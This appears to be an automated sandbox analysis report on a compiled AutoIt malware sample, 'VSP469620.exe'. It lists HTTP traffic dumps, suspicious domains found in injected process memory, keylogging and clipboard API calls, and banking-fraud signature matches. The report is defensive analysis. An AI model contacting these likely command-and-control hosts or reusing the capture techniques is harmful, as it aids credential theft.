1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:14:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 
1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:14:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:14:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:14:46 GMT server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:14:49 GMT server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:14:52 GMT server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:14:55 GMT server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:02 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:04 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:07 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:10 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56iRVz82rYHHYtPbfv%2FJ1bfWXhYdXV4SfXyvSQDenMWt5waNgekkwIeY9WEA8C4%2BIXINiuyNmTncsLK6M7b2DkloPDvWN09mejHPX7zICGnL5uwYnuD9c8mvW%2Fb99gBnKv7Gr%2BwrLnaLkoDn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b5e0bc48c72-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FmxdIQ3pf%2Bq5HA%2BoI9X3Qd3lvwSWkusOaGqom8JdMb5mwbpWnNtPVoo8VwzzX8u5i5LeE8PFEfun6Fx9gZEkbn7P%2Bnca9oGo94MooRAvj7gRmwcBiFMog3J5oUNuegDseD34ndOQSKDXVz0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b6ebe935e7d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LcPh%2FKNuOOVm%2FpjcbMQLpLUJyTcXZyZwgrQaAW31bwVtTvuWDVRHOkwVQekiOxQdGXzcVsAfO4esPjdR8AF24eZ%2FSbNuFZOlInZj2lDjtaJO6RZ3xRydUBvA5tLQBZJD5Yw6Ncxk1WSXXHh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b7f19664392-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1727&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjFf8F8XyA3lxztUDi8UFjl52I2VDdkS5WewFsuUDLrY6XzXLZvZNVWGInnRDPaJGZOo02PsbnoXPI6ugaQpVjJ1O4LHeFk%2Bc8%2Fyib8XE1ljIMpedAB1nc2fZdzAdfIv9CzTV%2BN4fzx%2BIEZe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b900e8b80da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=409&delivery_rate=0&cwnd=128&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: icsunattend.exe, 00000007.00000002.3145271641.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000027284000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://funnystory.online/2dyu/?9HaD=bADo
Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.heliopsis.xyz
Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.heliopsis.xyz/cclj/
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://2domains.ru
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: icsunattend.exe, 00000007.00000003.2004505152.00000000028A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2&
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: icsunattend.exe, 00000007.00000002.3142248419.0000000002874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: icsunattend.exe, 00000007.00000003.2003224862.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
                Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server194.hosting.reg.ru/manager
                Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00B06B0C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00B06D07
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00B06B0C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00AF2B37
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B1F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00B1F7FF

E-Banking Fraud

Source: Yara match | File source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AB3D19 This is a third-party compiled AutoIt script.
Source: VSP469620.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: VSP469620.exe, 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_db87d10b-b
Source: VSP469620.exe, 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0e85a2fe-8
Source: VSP469620.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_91ad297e-1
